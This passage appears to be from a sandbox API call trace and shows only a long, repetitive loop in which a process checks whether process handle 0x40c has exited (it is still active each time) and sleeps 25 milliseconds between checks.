(dwMilliseconds=0x19) [0181.168] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0181.168] Sleep (dwMilliseconds=0x19) [0181.205] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0181.206] Sleep (dwMilliseconds=0x19) [0181.256] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0181.257] Sleep (dwMilliseconds=0x19) [0181.375] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0181.375] Sleep (dwMilliseconds=0x19) [0181.420] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0181.420] Sleep (dwMilliseconds=0x19) [0181.465] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0181.466] Sleep (dwMilliseconds=0x19) [0181.514] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0181.514] Sleep (dwMilliseconds=0x19) [0181.559] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0181.559] Sleep (dwMilliseconds=0x19) [0181.630] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0181.631] Sleep (dwMilliseconds=0x19) [0181.710] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0181.710] Sleep (dwMilliseconds=0x19) [0181.808] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0181.808] Sleep (dwMilliseconds=0x19) [0181.850] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0181.850] Sleep (dwMilliseconds=0x19) [0181.978] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0181.979] Sleep (dwMilliseconds=0x19) [0182.014] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0182.014] Sleep (dwMilliseconds=0x19) [0182.049] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0182.049] Sleep (dwMilliseconds=0x19) [0182.088] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0182.088] Sleep (dwMilliseconds=0x19) [0182.188] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0182.188] Sleep (dwMilliseconds=0x19) [0182.224] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0182.224] Sleep (dwMilliseconds=0x19) [0182.261] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0182.261] Sleep (dwMilliseconds=0x19) [0182.298] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0182.298] Sleep (dwMilliseconds=0x19) [0182.337] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0182.338] Sleep (dwMilliseconds=0x19) [0182.382] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0182.382] Sleep (dwMilliseconds=0x19) [0182.419] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0182.419] Sleep (dwMilliseconds=0x19) [0182.455] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0182.455] Sleep (dwMilliseconds=0x19) [0182.491] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0182.492] Sleep (dwMilliseconds=0x19) [0182.559] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0182.559] Sleep (dwMilliseconds=0x19) [0182.599] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0182.599] Sleep (dwMilliseconds=0x19) [0182.636] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0182.636] Sleep (dwMilliseconds=0x19) [0182.673] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0182.673] Sleep (dwMilliseconds=0x19) [0182.707] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0182.707] Sleep (dwMilliseconds=0x19) [0182.743] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0182.743] Sleep (dwMilliseconds=0x19) [0182.784] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0182.784] Sleep (dwMilliseconds=0x19) [0182.819] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0182.819] Sleep (dwMilliseconds=0x19) [0182.855] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0182.855] Sleep (dwMilliseconds=0x19) [0182.907] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0182.907] Sleep (dwMilliseconds=0x19) [0182.942] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0182.942] Sleep (dwMilliseconds=0x19) [0182.980] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0182.980] Sleep (dwMilliseconds=0x19) [0183.028] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0183.028] Sleep (dwMilliseconds=0x19) [0183.199] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0183.199] Sleep (dwMilliseconds=0x19) [0183.272] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0183.272] Sleep (dwMilliseconds=0x19) [0183.346] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0183.346] Sleep (dwMilliseconds=0x19) [0183.404] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0183.404] Sleep (dwMilliseconds=0x19) [0183.513] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0183.513] Sleep (dwMilliseconds=0x19) [0183.571] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0183.571] Sleep (dwMilliseconds=0x19) [0183.636] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0183.636] Sleep (dwMilliseconds=0x19) [0183.690] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0183.690] Sleep (dwMilliseconds=0x19) [0183.769] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0183.769] Sleep (dwMilliseconds=0x19) [0183.814] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0183.814] Sleep (dwMilliseconds=0x19) [0183.846] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0183.846] Sleep (dwMilliseconds=0x19) [0183.908] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0183.908] Sleep (dwMilliseconds=0x19) [0183.952] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0183.952] Sleep (dwMilliseconds=0x19) [0184.006] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0184.006] Sleep (dwMilliseconds=0x19) [0184.042] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0184.042] Sleep (dwMilliseconds=0x19) [0184.079] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0184.079] Sleep (dwMilliseconds=0x19) [0184.190] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0184.190] Sleep (dwMilliseconds=0x19) [0184.225] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0184.226] Sleep (dwMilliseconds=0x19) [0184.308] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0184.308] Sleep (dwMilliseconds=0x19) [0184.345] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0184.345] Sleep (dwMilliseconds=0x19) [0184.387] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0184.387] Sleep (dwMilliseconds=0x19) [0184.429] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0184.429] Sleep (dwMilliseconds=0x19) [0184.465] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0184.465] Sleep (dwMilliseconds=0x19) [0184.500] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0184.500] Sleep (dwMilliseconds=0x19) [0184.536] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0184.537] Sleep (dwMilliseconds=0x19) [0184.576] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0184.577] Sleep (dwMilliseconds=0x19) [0184.674] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0184.674] Sleep (dwMilliseconds=0x19) [0184.715] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0184.715] Sleep (dwMilliseconds=0x19) [0184.784] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0184.784] Sleep (dwMilliseconds=0x19) [0184.826] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0184.826] Sleep (dwMilliseconds=0x19) [0184.886] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0184.886] Sleep (dwMilliseconds=0x19) [0184.934] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0184.935] Sleep (dwMilliseconds=0x19) [0185.039] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0185.039] Sleep (dwMilliseconds=0x19) [0185.088] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0185.089] Sleep (dwMilliseconds=0x19) [0185.244] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0185.244] Sleep (dwMilliseconds=0x19) [0185.307] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0185.307] Sleep (dwMilliseconds=0x19) [0185.354] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0185.354] Sleep (dwMilliseconds=0x19) [0185.394] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0185.394] Sleep (dwMilliseconds=0x19) [0185.498] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0185.498] Sleep (dwMilliseconds=0x19) [0185.534] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0185.534] Sleep (dwMilliseconds=0x19) [0185.579] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0185.579] Sleep (dwMilliseconds=0x19) [0185.621] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0185.621] Sleep (dwMilliseconds=0x19) [0185.656] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0185.656] Sleep (dwMilliseconds=0x19) [0185.690] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0185.690] Sleep (dwMilliseconds=0x19) [0185.732] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0185.732] Sleep (dwMilliseconds=0x19) [0185.768] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0185.768] Sleep (dwMilliseconds=0x19) [0185.862] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0185.862] Sleep (dwMilliseconds=0x19) [0185.919] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0185.919] Sleep (dwMilliseconds=0x19) [0185.959] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0185.959] Sleep (dwMilliseconds=0x19) [0186.000] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0186.000] Sleep (dwMilliseconds=0x19) [0186.035] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0186.035] Sleep (dwMilliseconds=0x19) [0186.070] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0186.070] Sleep (dwMilliseconds=0x19) [0186.107] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0186.107] Sleep (dwMilliseconds=0x19) [0186.236] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0186.237] Sleep (dwMilliseconds=0x19) [0186.272] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0186.272] Sleep (dwMilliseconds=0x19) [0186.307] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0186.307] Sleep (dwMilliseconds=0x19) [0186.344] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0186.344] Sleep (dwMilliseconds=0x19) [0186.396] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0186.396] Sleep (dwMilliseconds=0x19) [0186.431] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0186.431] Sleep (dwMilliseconds=0x19) [0186.466] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0186.467] Sleep (dwMilliseconds=0x19) [0186.502] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0186.502] Sleep (dwMilliseconds=0x19) [0186.539] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0186.539] Sleep (dwMilliseconds=0x19) [0186.577] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0186.577] Sleep (dwMilliseconds=0x19) [0186.618] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0186.618] Sleep (dwMilliseconds=0x19) [0186.655] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0186.655] Sleep (dwMilliseconds=0x19) [0186.691] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0186.691] Sleep (dwMilliseconds=0x19) [0186.726] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0186.726] Sleep (dwMilliseconds=0x19) [0186.765] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0186.765] Sleep (dwMilliseconds=0x19) [0186.802] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0186.802] Sleep (dwMilliseconds=0x19) [0186.837] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0186.837] Sleep (dwMilliseconds=0x19) [0186.890] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0186.891] Sleep (dwMilliseconds=0x19) [0186.926] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0186.926] Sleep (dwMilliseconds=0x19) [0186.973] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0186.973] Sleep (dwMilliseconds=0x19) [0187.009] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0187.009] Sleep (dwMilliseconds=0x19) [0187.046] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0187.046] Sleep (dwMilliseconds=0x19) [0187.082] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0187.082] Sleep (dwMilliseconds=0x19) [0187.202] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0187.203] Sleep (dwMilliseconds=0x19) [0187.241] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0187.241] Sleep (dwMilliseconds=0x19) [0187.277] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0187.277] Sleep (dwMilliseconds=0x19) [0187.312] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0187.312] Sleep (dwMilliseconds=0x19) [0187.348] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0187.348] Sleep (dwMilliseconds=0x19) [0187.392] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0187.392] Sleep (dwMilliseconds=0x19) [0187.430] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0187.430] Sleep (dwMilliseconds=0x19) [0187.467] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0187.467] Sleep (dwMilliseconds=0x19) [0187.509] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0187.509] Sleep (dwMilliseconds=0x19) [0187.546] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0187.546] Sleep (dwMilliseconds=0x19) [0187.581] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0187.581] Sleep (dwMilliseconds=0x19) [0187.631] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0187.631] Sleep (dwMilliseconds=0x19) [0187.686] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0187.686] Sleep (dwMilliseconds=0x19) [0187.742] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0187.743] Sleep (dwMilliseconds=0x19) [0187.779] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0187.779] Sleep (dwMilliseconds=0x19) [0187.826] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0187.827] Sleep (dwMilliseconds=0x19) [0187.889] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0187.889] Sleep (dwMilliseconds=0x19) [0187.939] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0187.939] Sleep (dwMilliseconds=0x19) [0187.987] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0187.987] Sleep (dwMilliseconds=0x19) [0188.023] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0188.024] Sleep (dwMilliseconds=0x19) [0188.066] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0188.066] Sleep (dwMilliseconds=0x19) [0188.105] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0188.106] Sleep (dwMilliseconds=0x19) [0188.245] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0188.246] Sleep (dwMilliseconds=0x19) [0188.284] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0188.284] Sleep (dwMilliseconds=0x19) [0188.321] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0188.321] Sleep (dwMilliseconds=0x19) [0188.356] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0188.356] Sleep (dwMilliseconds=0x19) [0188.392] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0188.392] Sleep (dwMilliseconds=0x19) [0188.434] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0188.434] Sleep (dwMilliseconds=0x19) [0188.470] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0188.471] Sleep (dwMilliseconds=0x19) [0188.505] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0188.505] Sleep (dwMilliseconds=0x19) [0188.541] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0188.541] Sleep (dwMilliseconds=0x19) [0188.583] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0188.583] Sleep (dwMilliseconds=0x19) [0188.621] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0188.621] Sleep (dwMilliseconds=0x19) [0188.729] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0188.729] Sleep (dwMilliseconds=0x19) [0188.806] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0188.806] Sleep (dwMilliseconds=0x19) [0188.843] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0188.843] Sleep (dwMilliseconds=0x19) [0188.903] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0188.903] Sleep (dwMilliseconds=0x19) [0188.939] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0188.939] Sleep (dwMilliseconds=0x19) [0189.111] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0189.111] Sleep (dwMilliseconds=0x19) [0189.289] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0189.289] Sleep (dwMilliseconds=0x19) [0189.339] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0189.339] Sleep (dwMilliseconds=0x19) [0189.376] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0189.376] Sleep (dwMilliseconds=0x19) [0189.413] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0189.413] Sleep (dwMilliseconds=0x19) [0189.456] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0189.457] Sleep (dwMilliseconds=0x19) [0189.493] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x19ff20 | out: lpExitCode=0x19ff20*=0x103) returned 1 [0189.493] Sleep (dwMilliseconds=0x19) [0189.529] GetExitCodeProcess (in: hProcess=0x40c, 